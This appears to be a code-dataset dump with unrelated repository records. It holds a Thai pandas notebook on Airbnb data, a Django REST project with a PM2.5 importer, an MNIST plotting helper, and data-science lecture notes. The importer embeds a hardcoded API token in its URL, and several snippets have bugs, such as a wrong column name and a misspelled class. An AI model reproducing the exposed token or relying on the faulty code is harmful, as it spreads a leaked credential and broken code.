ที่มีการลิสที่อยู่ที่มีราคาเฉลี่ยสูงที่สุด 10 อันดับแรก\n\n# In[574]:\n\n\nbnb.groupby(['host_id','host_name'],as_index = False).mean().sort_values('price')[::-1].head(10)\n\n\n# 17. จงเพิ่ม 2 คอลัมน์ชื่อ Year และ Month จาก last review ต่อท้าย โดยใช้ข้อมูลจากคอลัมน์ last_review (Hint: ใช้ lambda)\n\n# In[576]:\n\n\nbnb.head()\n\n\n# In[588]:\n\n\nbnb2 = bnb.dropna()\nbnb2[['Year','Month','Date']] = bnb2.last_review.str.split(\"-\",expand=True)\nbnb2.head()\n\n\n# 18. สร้าง column ใหม่ โดยให้บรรจุ Time of the week (วันจันทร์ อังคาร....) โดยใช้ข้อมูลจาก last_review (Hint: ใช้ timestamp เข้ามาช่วย) \n\n# In[699]:\n\n\nday_of_week = {0:'Mon',1:'Tue', 2:'Wed', 3:'Thur', 4:'Fri', 5:'Sat',6:'Sun'}\nbnb2['last_review'] = pd.to_datetime(bnb2['last_review'])\nbnb2['day_of_week'] = bnb2['last_review'].apply(lambda time: time.dayofweek)\nbnb2['day_of_week'] = bnb2['day_of_week'].map(day_of_week)\nbnb2_day = bnb2.drop('day of week',axis = 1)\nbnb2_day.head()\n\n\n# 19. สร้าง Count Plot นับข้อมูลประเภทของที่อยู่อาศัย\n\n# In[598]:\n\n\nfig = plt.figure(figsize = (12,8))\nsns.countplot(data = bnb, x = 'room_type')\nfig.show()\n\n\n# 20. สร้าง Pie Chart หาพื้นที่ ที่มีที่อยู่อาศัยเยอะที่สุด 5 อันดับแรก\n\n# In[377]:\n\n\nTop5Areas = bnb.groupby('neighbourhood').count().sort_values('id')[::-1].head(5)\nTop5Areas\n\n\n# In[378]:\n\n\nfig = px.pie(Top5Areas, values = 'id', names = Top5Areas.index)\nfig.show()\n\n\n# 21. สร้าง Box Plot โดยให้แกน X เป็น เขต และ Y เป็นจำนวนรีวิว\n\n# In[685]:\n\n\nfig = plt.figure(figsize = (25,10))\nfig = sns.boxplot(data = bnb, x = 'neighbourhood_group',y = 'number_of_reviews')\nfig.set(ylim = (0,80))\n\n\n# 22. สร้าง HeatMap จาก Correlation ของ DataFrame และพิจารณาดูความสัมพันธ์ พร้อมกับนำความสัมพันธ์ที่เป็น Strongest Positive มาทำ Scatter Plot\n\n# In[604]:\n\n\nbnb_corr = bnb.corr()\nbnb_corr\n\n\n# In[611]:\n\n\nfig = plt.figure(figsize = (15,15))\nsns.heatmap(bnb_corr, annot = True)\n\n\n# In[614]:\n\n\nfig = plt.figure(figsize = (12,10))\nsns.scatterplot(data = bnb, x = 'reviews_per_month',y = 'number_of_reviews')\nfig.show()\n\n\n# 23. สร้าง Bar plot หาจำนวน Last review ของแต่ละเดือนของปี 2018 (change from count plot to bar plot)\n\n# In[701]:\n\n\nbnb3 = bnb2_day.groupby(['Year','Month'], as_index = False).sum()\nbnb4 = bnb3[bnb3['Year'] == '2018']\nbnb4\n\n\n# In[686]:\n\n\nfig = plt.figure(figsize = (12,10))\nsns.barplot(data = bnb4, x = 'Month', y = 'number_of_reviews')\nfig.show()\n\n\n# 24. สร้าง Pie Chart หาอัตราส่วน Last Review ในแต่ละวัน\n\n# In[700]:\n\n\nfig = px.pie(bnb2_day , values = 'number_of_reviews', names = 'day_of_week')\nfig.show()\n\n\n# 25. สร้าง Line Graph หาราคาเฉลี่ยในแต่ละเดือนของ Last Review ในปี 2019\n\n# In[702]:\n\n\nbnb5 = bnb2_day.groupby(['Year','Month'], as_index = False).mean()\nbnb6 = bnb5[bnb5['Year'] == '2019']\nbnb6 #vdo is wrong no 2019 \n\n\n# In[707]:\n\n\npx.line(bnb6 , x = 'Month',y = 'price')\n\n\n# 26. สร้าง Column ใหม่ โดยคำนวณ ณ เวลาปัจจุบันถึงวันที่ Last Review ห่างกันกี่วัน (Hint: ใช้ datetime ปัจจุบัน - datetime last review)\n\n# In[713]:\n\n\nimport datetime\ntoday = datetime.datetime.today()\ntoday \n\n\n# In[717]:\n\n\nbnb2_day['diff']= bnb2_day['last_review'].apply(lambda past: (today - past).days)\nbnb2_day.head()\n\n\n# 27. สร้าง Pie Chart ของระยะห่างของเวลา ระหว่างปัจจุบันถึง Last review เฉลี่ย ของแต่ละเขต (หน่วยเป็นวัน)\n\n# In[720]:\n\n\nbnb7 = bnb2_day.groupby('neighbourhood_group', as_index = False).mean()\nbnb7\n\n\n# In[721]:\n\n\nfig = px.pie(bnb7 , values = 'diff', names = 'neighbourhood_group')\nfig.show()\n\n\n# 28. สร้าง Bar Plot ของระยะห่างของเวลา ระหว่างปัจจุบันถึง Last review เฉลี่ย ของแต่ละพื้นที่ 10 พื้นที่แรกที่มีระยะเวลามากที่สุด (หน่วยเป็นวัน)\n\n# In[724]:\n\n\nbnb8 = bnb2_day.groupby('neighbourhood', as_index = False).mean().sort_values('diff')[::-1].head(10)\nbnb8.head()\n\n\n# In[727]:\n\n\nfig = plt.figure(figsize = (23,10))\nsns.barplot(data = bnb8, x = 'neighbourhood', y = 'diff')\nfig.show()\n\n\n# 29. สร้าง Bar Plot ของค่าเฉลี่ยระยะเวลาห่างระหว่างปัจจุบันถึง Last review เฉลี่ย ของแต่ละพื้นที่ 10 พื้นที่แรกที่มีระยะเวลาน้อยที่สุด \n\n# In[728]:\n\n\nbnb9 = bnb2_day.groupby('neighbourhood', as_index = False).mean().sort_values('diff')[::-1].tail(10)\nbnb9.head()\n\n\n# In[729]:\n\n\nfig = plt.figure(figsize = (23,10))\nsns.barplot(data = bnb9, x = 'neighbourhood', y = 'diff')\nfig.show()\n\n\n# 30. สร้าง Scatter Plot หาความสัมพันธ์ระหว่าง ระยะเวลาห่างระหว่างปัจจุบันถึง Last review กับ Minimum Nights (Hint: Correlation)\n\n# In[730]:\n\n\nfig = plt.figure(figsize = (15,15))\nsns.heatmap(bnb_corr, annot = True)\n\n\n# In[732]:\n\n\nfig = plt.figure(figsize = (20,10))\nsns.scatterplot(data = bnb2_day, x = 'diff',y = 'minimum_nights')\nfig.show()\n\n\n# In[733]:\n\n\npx.scatter(bnb2_day, x = 'diff',y = 'minimum_nights')\n\n" } ]
2
kazoon-n/django-rest
https://github.com/kazoon-n/django-rest
d48fe9d527d80529426a3fc0f7bd967168d5a8b0
fd850eae30981d7f348b639c2335689a36294512
313424e91b5810d3110b9de161a3269b581d9211
refs/heads/master
2022-12-24T01:53:03.371323
2019-02-23T10:30:14
2019-02-23T10:30:14
172,196,366
0
0
null
2019-02-23T09:33:13
2019-02-23T10:30:16
2022-12-08T01:38:07
Python
[ { "alpha_fraction": 0.4979591965675354, "alphanum_fraction": 0.7061224579811096, "avg_line_length": 16.5, "blob_id": "922fa411552f1fec78a0ffe2e691293274f334dd", "content_id": "aa51dbae80c7c62ebb69f69505dcc4debd9dcd17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 245, "license_type": "no_license", "max_line_length": 26, "num_lines": 14, "path": "/requirements-dev.txt", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "certifi==2018.11.29\nchardet==3.0.4\ndj-database-url==0.5.0\ndj-static==0.0.6\nDjango==2.1.5\ndjango-filter==2.0.0\ndjangorestframework==3.9.0\nidna==2.8\nMarkdown==3.0.1\npython-decouple==3.1\npytz==2018.9\nrequests==2.21.0\nstatic3==0.7.0\nurllib3==1.24.1\n" }, { "alpha_fraction": 0.49668875336647034, "alphanum_fraction": 0.5496688485145569, "avg_line_length": 25.2608699798584, "blob_id": "ea94d764fb7351e40b756ee355f87b9bbf7985d7", "content_id": "6b61f47af797fe4c6a0f71066d1bbc758691e19b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 604, "license_type": "no_license", "max_line_length": 122, "num_lines": 23, "path": "/core/migrations/0003_auto_20190112_0309.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-01-12 03:09\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0002_auto_20190110_1720'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='customer',\n old_name='date_sheet',\n new_name='data_sheet',\n ),\n migrations.AlterField(\n model_name='document',\n name='dtype',\n field=models.CharField(choices=[('ID', 'Identity card'), ('OT', 'others'), ('PP', 'Passport')], max_length=2),\n ),\n ]\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7582417726516724, "avg_line_length": 17.200000762939453, "blob_id": "765c96779a0c06ec951d1bdf64657a99d6fe6697", "content_id": "3f060b27d66b695b2a0e789a7fbf40045c31ece5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/pm25main/apps.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass Pm25MainConfig(AppConfig):\n name = 'pm25main'\n" }, { "alpha_fraction": 0.5118694305419922, "alphanum_fraction": 0.562314510345459, "avg_line_length": 27.08333396911621, "blob_id": "e40179c63a62889d56fed80d4d6ffed5a369424b", "content_id": "76a17a5b9b072a50a6b9e2f29534f97a9679ed28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 674, "license_type": "no_license", "max_line_length": 122, "num_lines": 24, "path": "/core/migrations/0008_auto_20190128_1554.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-01-28 15:54\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0007_auto_20190115_1713'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='customer',\n name='doc',\n field=models.CharField(default='testdoc', max_length=12, unique=True),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='document',\n name='dtype',\n field=models.CharField(choices=[('ID', 'Identity card'), ('PP', 'Passport'), ('OT', 'others')], max_length=2),\n ),\n ]\n" }, { "alpha_fraction": 0.703125, "alphanum_fraction": 0.703125, "avg_line_length": 20.33333396911621, "blob_id": "53a671479fc0b62e0f5763778f73ffc789addb6b", "content_id": "d34b4e9fd0e6d39cc43bb024a8a4890327ac068b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 128, "license_type": "no_license", "max_line_length": 59, "num_lines": 6, "path": "/importer/urls.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('execute/', views.call_importer, name=\"importer\"),\n]\n" }, { "alpha_fraction": 0.6164153814315796, "alphanum_fraction": 0.6359575390815735, "avg_line_length": 27.41269874572754, "blob_id": "763c62d0182bafe5bbafa29db2c4633c4510a1ad", "content_id": "108a9649acbbf177844e5ce5675f1dd90def0f73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1791, "license_type": "no_license", "max_line_length": 101, "num_lines": 63, "path": "/importer/views.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "import logging\nfrom ast import parse\n\nimport requests\nfrom django.core.management import BaseCommand\n\n# Create your views here.\nfrom django.shortcuts import render\nfrom django.template.base import logger\nfrom rest_framework.utils import json\n\nlogger = logging.getLogger(\"command\")\n\nAPI_END_POINT = (\"https://api.waqi.info/feed/{city}/?token=f8c14b8df33312a1d1842fe35e360768f958f4c0\")\n\n\ndef aquire_pm25_data_from_api(city: str):\n\n request_url = API_END_POINT.format(\n city=city,\n )\n res = requests.get(request_url)\n res.raise_for_status()\n row_data = json.loads(res.content)[\"data\"]\n\n logger.info(\"Finish importing data of PM2.5\")\n\n return row_data\n\n\ndef call_importer(request):\n city = request.GET[\"city\"]\n\n res = aquire_pm25_data_from_api(city)\n\n return res\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\"--from_date\", default=None)\n parser.add_argument(\"--to_date\", default=None)\n parser.add_argument(\"--city\", default='bangkok')\n\n def handle(self, *args, **options):\n from_date = options.get(\"from_date\")\n to_date = options.get(\"to_date\")\n city = options.get(\"city\")\n\n if from_date is not None:\n try:\n from_date = parse(from_date)\n except (ValueError, OverflowError) as e:\n raise ValueError(\"The format of the from_date is wrong: %s.\" % e)\n\n if to_date is not None:\n try:\n to_date = parse(to_date)\n except (ValueError, OverflowError) as e:\n raise ValueError(\"The format of the to_date is wrong: %s.\" % e)\n logger.info(\"start: update exchange rate\")\n aquire_pm25_data_from_api(city)\n logger.info(\"end: update exchange rate\")\n\n" }, { "alpha_fraction": 0.5490196347236633, "alphanum_fraction": 0.593837559223175, "avg_line_length": 28.75, "blob_id": "a66bea2f6ecdbeec545ed8aacb0fb40622d75d96", "content_id": "f21a3c9388fb43f458464898ae86ac0a2223b067", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "no_license", "max_line_length": 122, "num_lines": 24, "path": "/core/migrations/0011_auto_20190217_0908.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-02-17 09:08\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0010_auto_20190217_0814'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='customer',\n name='data_sheet',\n field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to='core.DataSheet'),\n ),\n migrations.AlterField(\n model_name='document',\n name='dtype',\n field=models.CharField(choices=[('ID', 'Identity card'), ('OT', 'others'), ('PP', 'Passport')], max_length=2),\n ),\n ]\n" }, { "alpha_fraction": 0.7922077775001526, "alphanum_fraction": 0.8051947951316833, "avg_line_length": 18.375, "blob_id": "63141529cb6cdf29544d201df5fbf388ed4a5293", "content_id": "6d5b86e50b565cc9e9322e3b02eb23d7b67b6dab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 44, "num_lines": 8, "path": "/pm25main/views.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import viewsets\n\n\nclass Pm25GetViewSet(viewsets.ModelViewset):\n pass" } ]
8
emanuelfeld/ml-coursera
https://github.com/emanuelfeld/ml-coursera
9451dedf530b221f2569fc294065c6af0ac1411a
f8b8b450af3bc2d955b0dde8e59b966407524ddc
1561a678a8b0d97453d28ea7e3a8f949b042f108
refs/heads/master
2021-09-03T06:04:59.258526
2018-01-06T05:53:16
2018-01-06T05:53:16
116,452,070
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5651537179946899, "alphanum_fraction": 0.5915080308914185, "avg_line_length": 30.090909957885742, "blob_id": "a6072ffac4f32ba00f059a26faba61c4d9693073", "content_id": "092a00372ea7671c3dbdc93a8778495bfe34132b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 683, "license_type": "no_license", "max_line_length": 68, "num_lines": 22, "path": "/utilities.py", "repo_name": "emanuelfeld/ml-coursera", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\ndef plot_mnist_result(X, y, prediction):\n # plot 25 random points in a grid\n idx = np.random.choice(np.arange(X.shape[0]), 25, replace=False)\n X_sample = X[idx]\n p_sample = prediction.flatten()[idx]\n y_sample = y.flatten()[idx]\n \n for i in range(25):\n pixels = X_sample[i].reshape((20, 20))\n color = 'green' if p_sample[i] == y_sample[i] else 'red'\n title = p_sample[i] if p_sample[i] != 10 else 0\n\n plt.subplot(5, 5, i + 1)\n plt.axis('off')\n plt.title(title, color=color)\n plt.subplots_adjust(wspace=2)\n plt.imshow(pixels.T, cmap='gray')\n\n plt.show()" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 13.333333015441895, "blob_id": "0289aee75c4d82c2a65316212fe09b448b23723e", "content_id": "eba1541eecbcfb20c401d3732027f9dd7fbdf7c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 42, "license_type": "no_license", "max_line_length": 27, "num_lines": 3, "path": "/README.md", "repo_name": "emanuelfeld/ml-coursera", "src_encoding": "UTF-8", "text": "# ml-coursera\n\nCoursera ML class in Python" } ]
2
geoffisdancing/galnotes
https://github.com/geoffisdancing/galnotes
23ee822a310e9df22918c2813cfcbc37545da166
81567e294d6d07a51c7561aefa3054bdbf620b40
1937f9904bd592c2901c69a2481e726ce81f65f9
refs/heads/master
2021-01-20T20:32:42.140995
2017-08-03T18:19:00
2017-08-03T18:19:00
62,321,843
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7367845773696899, "alphanum_fraction": 0.7428185939788818, "avg_line_length": 81.86377716064453, "blob_id": "adb9c0e86ea87eb878f3b683c5e6c75a751d7e55", "content_id": "0b7c00b124cd8806a63699a169caaa88ea50156f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 105315, "license_type": "no_license", "max_line_length": 496, "num_lines": 1270, "path": "/160601 Galvanize Lecture Notes.md", "repo_name": "geoffisdancing/galnotes", "src_encoding": "UTF-8", "text": "160822 Model Comparison Lecture\n 1. Linear Model\n - Interpretability, given the linear assumption\n - R2 represents the total variabilty explained by the model. Recall that by adding more features, R2 increases, so be aware that this is a limitaiton of R2 (doesn't penalize for increased features (model complexity))\n - So adjusted R2, AIC, BIC account for increased complexity\n - Need to assume constant variance in errors (homoskedastic)\n - ie residuals are clustered randomly as x increases in residual plot.\n - can do transformations to address this (because will be biased in the long-run)\n - Assume mean zero\n - Assume no multicolinearity, assume no autoregressive terms\n 2. Logistic Regression\n - Need to normalize each feature if you want to interpret betas as strenghts of association\n - Regularization of regression (in general) with Ridge/Lasso helps to optimize the Bias/Variance tradeoff, such that you decrease variance without sacrificing too much Bias\n - Elastic net as the nice combination of LASSO & Ridge.\n 3. KNN\n - Pick \"k\" using cross-validation\n - Can be helpful to impute data\n 4. Decision Trees\n - Can only do axis parallel splits\n - In regression , minimize mean squared error in each leaf\n - In classification, minimize \"information criteria\" Not sure, review\n - \"Greedy algorithm\" meaning will pick the best split at the given point, without regard for the bigger picture performance.\n - Almost never converges to the global optimimum\n - Slow, because will look at every possible split at every node, so this take a lot of computational time.\n - Deterministic, meaning it will build the same tree each time\n - Decide on tree depth:\n - Prepruning: depth, number of points in node etc\n - Post pruning: prune back after making it deep .\n 5. Ensembling techniques\n - Bagging: Bootstrap Aggregating\n - Create bunch of trees on a bootstrapped subsample of the data\n - Inherently correlated\n - But decrease variance\n - Random forest: Same as Bagging, except that at each split, limit features space\n - Taking the average of trees, so, makes it difficult to overfit\n 6. SVM\n - Perform fairly well in high dimension cases\n 7. Gradient Boosting\n - Forward stagewise, learns from the prior model\n - Gradient descent by fitting a new tree to the residuals\n - Aggregating, trying to fit to where you didn't fit as well earlier\n - Hyperparameters:\n - depth of tree\n - learning rate: ignore votes of some tree\n - number of trees\n - minimum samples per leaf\n 8. Unsupervised Methods\n - K Means\n - can't include categorical variables \n - need to scale the variables\n - Hierarchical Clustering\n - Choose two points close to one another, form groups from bottom up\n - Dendrograms result and you can then chop off dendrograms at certain points to determine what groups look at at that point\n - Benefit is you don't need to pick K at each point\n - PCA\n - Reduce dimensionality\n - There's the possibility that the explanatory variable with the greatest predictive power is not in one of the dimensions reduced by PCA, causing it not to perform well\n - SVD is a way of fitting\n - Can do some latent feature analysis\n\n\n\n\n160722 Graph Theory\n 1. Terms:\n - A graph is an unordered pair G = (V, E)\n - V is our set of vertices\n - E is a set of edges (pairs of vertices)\n - V = {1,2,3}, E = {{1,2}, {2,3} etc}\n - ORder is number of vertices, Size is number of edges\n - Simple Graph: No loops and no multiple edges\n - Degree: Number of neighbors\n - For an undirected graph, an adjacency matrix is symmetric across the diagonal\n - An Adjacency list is a list of nodes and edges denoting connection. An adjacency list requires storage of VxE, whereas an adjacency matrix requires storage of V^2 (since its a matrix)\n - For lookup, Adjacency list requires searching V items for your answer, a matrix essentially doesn't require lookup since you can index right to your answer\n 2. Node importance\n - Degree centrality = # of connections\n - Betweenness centrality = a measure of node importance based on how many (shortest) paths cross through a given node\n - Eigenvector centrality = Take the eigenvector of the adjacency matrix multiplied by matrix of ones, then again over and over see SSS21\n - Way of accounting for the importance of nodes who are connections to a given node to determine the importance / centrality of the given node\n - SSS21\n - What Makes a community:\n - Mutual Ties\n - Compactness\n - Dense edges\n - Separation from other groups\n - Modularity, Q, is a measure of community-ness\n - SSS22 Modularity equation\n - m is total number of degrees in the network\n - Heuristic to maximize modularity is to cut the edges with the greatest betweenness centrality, and calculate the modularity equation in the remaining communities created--and graph this; repeat for the next edge with next highest betweenness centrality. The edge at which this will peak and this peak is appx where the Q is maximized.\n\n\n160721 Spark AWS\n 1. Spark Data Frames\n - Faster than traditional RDDs.\n - Abstraction that simplifies working with structured databases.\n - So after creating a spark context, you instantiate a hive or SQL context (feeding it the spark context).\n - Load up data directly into the hive context.\n\n\n160720 Apache Spark\n 1. Overall\n - Spark is a framework for distributed processing\n - Streamlined alternative to Map-Reduce\n - Spark can be written in Scala, Java or Python\n - Can analyze petabytes of data\n - Faster than Map Reduce, API is simpler\n - Spark job consists of a series of map and reduce function\n - Intermediate data is kept in memory rather than written to disk\n - Trade off is that it requires more memory.\n - Spark outshines Map Reduce with iterative algorithms, where you don't have to save results of each step to disk\n - For non-iterative algorithms Spark is comparable to Map Reduce\n 2. Spark\n - HIGH LEVEL SUMMARY: So with spark, you construct the RDD, feed it a list of data, then perform a series of transformations (can be many) until you have what you want and then perform an action to aggregate the result.\n - A Spark job pushes the data to the cluster, all computation happens on the executors, then the result is sent back to the driver.\n - Spark does the parallelizing for you!\n - RDD:\tResilient Distributed Dataset or a distributed sequence of records\n - Spark Job:\tSequence of transformations on data with a final action\n - Transformation:\tSpark operation that produces an RDD\n - Action:\tSpark operation that produces a local object\n - Spark Application:\tSequence of Spark jobs and other code\n - Transformations occur on the Worker nodes\n - The data is collected on the Driver\n 3.\n - Group by key stores the values in memory, where as reduce by key, you only maintain the current accumulator so it is more light weight. But if you need the individual elements, you need to use group by key.\n - Spark MLib : ML library for use on Spark\n\n\n\n\n\n160719 Map Reduce\n 1. MMD Reading: Map Reduce\n A. Several distributed file systems: Google File System, Hadoop Distributed FIle System, CloudStore\n - Very large files (if small, no need for DFS) KEY REQUIREMENT\n - Files rarely updated, rather they are read as data KEY REQUIREMENT\n - Files are divided into chunks 64MB size, repeated ~3 times at three different nodes\n B. Overall Map-Reduce Structure:\n - Some number of Map tasks are given one or more chunks from a distributed file system. These Map tasks turn the chunk into a sequence of key-value pairs. The Map function determines how to calculate the value from the key.\n - Key value pairs are collected by the master controller and sorted by key. All key-values pairs with the same key end up with the same Reduce task.\n - The Reduce function combines all values associated with a given key in the way determined by the Reduce function.\n 2. Big Data - Distributed Computing \n A. The three Vs of Big Data\n - High Volume, Velocity, Variety\n - With distributed computing systems (involving many computers) you can scale \"out\" which means adding more computers which can thus take advantage of parallelizable algorithms\n - Distributed Computing pros: Better scalability, easy to add more machines than to add more cores to a machine.\n - Fault tolerance - if one machine fails the whole network is not down\n - There is overhead involved with having multiple computers in a network communicate with each other, and there is a restrained set of problems that can readily be solved in a paralellizable way. So these considerations must be made when deciding whether to use distributed solutions.\n B. Map Reduce \n - Pushes the code to the data (rather than moving data to the code)\n - Map Reduce handles details of distributed computing taking care of:\n - Parallelization and Distribution\n - Partitioning (shuffle & sort)\n - Fault tolerance\n - Resource Management\n - Status and monitoring\n - Map Function: Applies a function to each elements of a data structure\n - Action of taking in some form of data and filter/transforming it into another form. Outputs 0 or more possibly transformed versions of the data\n - Reduce Function: Takes a function which aggregates the elements of a data structure\n - Action of taking a bunch of grouped data and combining it.\n - Network/Bandwidth is a limited resource in Map Reduce operations. So try to decrease the amount of data that you need to move/sort around the framework.\n - HIVE - SQL like language to query Map Reduce\n - APACHE HBASE -\n - Pig - high level language over Map Reduce\n\n\n\n\n160718 Amazon Web Services\n 1. Instance type:\n m4, general purpose, balance between network, CPU etc\n c, denotes compute\n g, denotes GPU based instances\n\n\n160712 Neural Networks\n 1. Dense layer, or fully connected layer: proximal layer has connections between every node in that layer and the input layer\n - Each node in each layer is a function of the outputs of the input layer\n - Place a different weight on each connection between the input layer and layer 1\n - Can initialize with a random weight\n - So you have a matrix of weights between every node in each layer\n - Goal is to learn the weights via training\n - So the function of a given node is then the matrix-wise dot product of the weights for that layer dot-product the input layer (preceding).\n - There is additionally an \"activation function\" that defines how to combine the inputs with the weights from each node of the layer. Usually define the function uniformly across the layer, and often across the neural network.\n - Several functions work better than others for this purpose\n - Constraint is that the function must be differentiable\n - Predefine neural network structure and functions etc.\n - Weights are then learned via \"training\" to minimize the output loss function\n - SSS20 Neural Network Architecture\n - Layer 2, for example, will take the augmented values of layer 1, run it through the activation function, and output to the next layer\n - Loss function is put on the output (must be differentiable) to determine the loss of true vs. predicted, and then change weights to minimize the loss\n 2. Optimizing Weights:\n - LEARN MORE HERE: ultimately you can describe the impact a given weight has on the ultimate loss function as a function of distal layers/weights.\n - So you send a \"batch\" of x's through the network, obtain a loss function, then\n - backpropagation is using that loss to calculate the optimal weights to minimize loss.\n - Then send another batch through, repeat.\n - Ultimately, the network will see all the data in various batches\n 3. General\n - Neural networks require a lot of data to train, and underperform with smaller data sets\n - But performance tends to continue to increase as data gets bigger\n - Width of the network describes the number of nodes per layer\n - Rules of thumb:\n - First go for depth of the network\n - Once can do that (errors etc), can increase width of the layer\n - Want to \"overfit the data\", then impose regularization\n - Drop out: is a value x btw 0-1, and will ignore x weights during forward and back propagation, to \"force the net to adjust the weight on a future prop if it is really important\"\n - Learning Rate: decreasing the learning rate per node (similar to in trees)\n 4. Convolutional Neural Networks\n - Good when inputs are correlated with one another; ie pixels in an image\n - Convolutions are smaller matrices that act as a filter when you pass it over the larger image.\n - Train a neural network to learn the smaller matrices/filters. Similar to learning the weights in the above NN\n - Note that this is not a dense network, only some nodes are affecting subsequent nodes\n - After a convolutional layer, often do a \"Pooling\" layer (ie Max Pooling), which uses a small convolution ie 3x3, then takes the max of that area, then creates another smaller layer (causes significant information degradation). Tries to solve the problem of things not appearing in the exact same places, pooling tries to solve this.\n - Can intersperse several convolutional layers and a pooling layer, and repeat as needed.\n - In subsequent layers of the network, each convolution is akin to a node, and the convolutions themselves are like weights that are changed with each forward/back-propagation. Therefore, each layer can \"learn\" more complex interactions between the features, again such that you decrease the loss function.\n - After the last convolutional layer, \"unravel\" the features that come out of the last layer into one or two fully-connected layers before giving the output predictions.\n 5. General learnings from trying (in discussion with Carey):\n A. First step in building a neural net is to build it such that you can show that it is \"learning\" and thus overfitting.\n - Do this by building it as deep first then wide second as possible, and adding the relevant filters / max-pooling (or other pooling layer) that make sense conceptually given the problem.\n - Then can feed it a subset of the training data (in replicate, ie x 10) and see if it perfectly predicts the output ie 100% accuracy. This suggests that it is overfitting and thus learning.\n - Can then impose \"regularization\" through increasing dropout, decreasing layers, increasing filters etc, and test the performance of this (ie how well you are controlling for overfitting) using cross validation.\n - Then ultimately once you've adequately regularized and adjusted for overfitting as suggested by cross-validation, then feed it test data and see how it does.\n - Recall that you need to take the complexity of the data into account in the design of your model. Ie if it is a simple dataset, you shouldn't build a deep network, otherwise you will overfit. So prune layers.\n B. Other things\n - Its reasonable to use relu function for all upper layers, and then relevant activation for the final layer, such as sigmoid for a binary outcome.\n - There is a train of thought that rather than initializing weights with the random uniform, perhaps use a gaussian distribution which may improve performance. Look into this and consider implementing.\n\n\n160707 Recommenders: Collaborative Filtering Recommenders\n 1. Collaborative Filtering\n - considers past users behavior to predict missing ratings\n - other types of recommending:\n - popularity, independent of user's themselves\n - content based: based on the properties/characteristic of an item and past user's behavior\n - How to compare similarity?: User to user or item to item. In a setting where there are more users than items, calculating item to item similarity requires less computations.\n - Also, user rows are sparsely populated. Whereas items are more densely populated\n - Similarity comparison:\n - Euclidean distance in practice doesn't work well as a comparison of similarity\n - Pearson Correlation: measures how much two vectors deviate from their mean together. Isn't sensitive to users who consistently rate low or high\n - Cosine distance: Measures the angle between two vectors. Equivalent to Pearson correlation coefficient when vectors are mean centered.\n - Jaccard Similarity: Usable when you don't have ratings but have boolean data. Measures similarity between two sets.\n 2. Predicting Ratings\n - SSS16 Predicting Ratings\n - to predict rating for item i: (the sum of similarities between items i and j times the user's true rating of item j) / sum of the similarities of items i and j.\n - TO improve performance, can restrain calculations to items most similar to i.\n 3. Recommenders are hard to validate:\n - often deploy in A/B testing manner and see if it leads to more conversions\n - can do k-fold cross validation\n - Error metric: RMSE, though this considers how far off you are with all your ratings.\n - Precision: proportion of top-n documents that are relevant \n - Recall: proportion of relevant items in the top n.\n - To do cross validation for a recommender:\n - keep a percentage of your cells that have data (of the sparse matrix) and hold this as out as your test set. Then do cross-validation on the remaining (training set), and you can get an approximation of error using your held out test set. This is under the assumption that there is an ADDITIONAL test set that you will obtain a final score on (ie in a competition style setting).\n 4. Review of SVD/ PCA\n - All decomposed matrices (ie all axes of PCA) will be orthonormal.\n - SVD is not very good for very sparse matrices, since you need to fill in missing values, and so the algorithm will try to fit to those values (ie 0) which doesn't perform well.\n - NMF can be a good option for recommending systems using sparse matrices.\n - The decomposed matrices W*H (from V = W*H)\n - One thing you need to do is to impose a regularization factor (the right side of the equation), so given the missing values, some values are not necessarily seen? ? so you need to impose a constraint on them using the normalization factor.\n - SSS17 NMF equation for recommendation\n 5. NMF\n - Much of the observed variation in rating values is due to item bias and user bias. Capture this using a few bias terms: overall bias of the rating by the user i for item j:: b-ij = mean rating + b-i + b-j. bi = bias of the user 